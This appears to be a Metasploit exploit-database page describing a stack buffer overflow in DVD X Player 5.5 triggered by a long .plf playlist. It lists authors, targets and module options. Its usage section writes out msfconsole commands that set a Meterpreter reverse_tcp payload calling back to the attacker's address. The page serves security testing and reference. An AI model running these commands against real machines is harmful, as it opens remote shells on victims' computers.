DVD X Player 5.5 .plf PlayList Buffer Overflow | Metasploit Exploit Database (DB)

DVD X Player 5.5 .plf PlayList Buffer Overflow

This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and Standard. By supplying a long string of data in a plf file (playlist), the MediaPlayerCtrl.dll component will attempt to extract a filename out of the string, and then copy it on the stack without any proper bounds checking, which casues a buffer overflow, and results arbitrary code execution under the context of the user. This module has been designed to target common Windows systems such as: Windows XP SP2/SP3, Windows Vista, and Windows 7.

Search Other Modules


Exploit Rank

  • Normal

Exploit Authors

  • n00b < >
  • D3r K0n!G < >
  • sickness < >
  • sinn3r < sinn3r [at] metasploit.com >

Vulnerability References


Exploit Targets

  • 0 - DVD X Player 5.5 Standard / Pro (default)

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/fileformat/dvdx_plf_bof
msf exploit(dvdx_plf_bof) > show payloads
msf exploit(dvdx_plf_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(dvdx_plf_bof) > set LHOST [MY IP ADDRESS]
msf exploit(dvdx_plf_bof) > exploit


Exploit Module Options

FILENAME The file name (default: msf.plf)
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session